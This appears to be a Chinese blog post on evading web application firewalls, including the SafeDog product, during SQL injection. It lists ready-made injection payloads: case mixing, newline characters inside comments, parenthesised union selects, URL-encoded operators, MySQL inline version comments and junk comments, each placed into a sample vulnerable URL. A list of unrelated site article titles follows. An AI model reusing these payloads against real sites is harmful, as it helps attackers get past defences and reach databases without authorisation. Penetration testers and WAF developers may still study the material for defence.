绕WAF&安全狗新姿势
2024-09-18 13:34:07
俗话说只要思路宽,绕狗绕的欢。前段时间我有尝试着用以下的方法绕狗,效果还不错。不过这方法呢也许这段时间可以绕过,过段时间可能就失效了,大家还是要多去尝试找到更多的方法。
举例-->整型注入 绕过WAF
绕过方法:
- 就是修改大小写 加%0a 或%0d去绕过(%0a是换行,%0d是回车) 如: and 1=1 可能会被过滤可改为 /*%0Aand%0a*/ 1=1 或 and 'a' in('a','b') 或 /*%0AaNd%0A*/ 1=1
- Order by 7 可改为 group by 7 或group by (7)去绕过
- 加括号去尝试 id=-1 union select 1,2,3 可改为 id=-1 union (((select (1),2,3)))
加+ - ! @ 去尝试 id=-1 union select +或者@或者!或者- 1,2,3
加%0a换行) id=-1 union %0a select %0a 1,2,3
绕过安全狗:
- And 可用 url编码%26表示
- 加内联 和数字去绕过 如:http://www.xxx.com/union.php?id=-1 /*!union/*!44322/*!22322select*/ 1,2,3,4
- 每个词前加它/*%!a*/ 就是干扰 如:http://www.xxx.com/union.php?id=-1 union/*%!a*/select/*%!a*/1,2,3,4
最新文章
- GOLANG 注释
- treeGrid树形数据表格的json数据格式说明
- Navicat Premium11.0.20破解版快速安装配置(附文件)
- extern 相关
- express中使用 connect-flash 及其源码研究
- Interface的多层继承
- 利用纯java捕获和播放音频
- CDH5 安装过程
- 【转】求质数算法的N种境界
- Mysql net start mysql启动,提示发生系统错误 5 拒绝访问,原因所在以及解决办法
- 老司机和你深聊 Kubenertes 资源分配之 Request 和 Limit 解析
- 201521123037 《Java程序设计》第12周学习总结
- 【Learning】 多项式的相关计算
- elementui+vue修改elementUi默认样式不生效
- SpringCloud调用服务原理
- DES加密模式详解
- 【校招面试 之 网络】第2题 TCP的可靠传输、流量控制、滑动窗口
- 从裸机编程到嵌入式Linux编程思想的转变------分而治之:驱动和应用程序
- Unity游戏AI记录(2d横板为例)
- python 导出mongoDB数据中的数据
热门文章
- Dictionary CovertTo List
- S5700的Eth-Trunk端口汇聚(trunk实验)
- soapui 调用wsdl 步骤以及出现的问题
- 【转】MaBatis学习---源码分析MyBatis缓存原理
- jqery-easyui的Datagrid的介绍-Pagination事件
- 模拟的confirm
- 联想笔记本BIOS设置中文详解
- 13.1SolrCloud集群使用手册之Collections API
- 6.Solr4.10.3API使用(CURD)
- Android (争取做到)最全的底部导航栏实现方法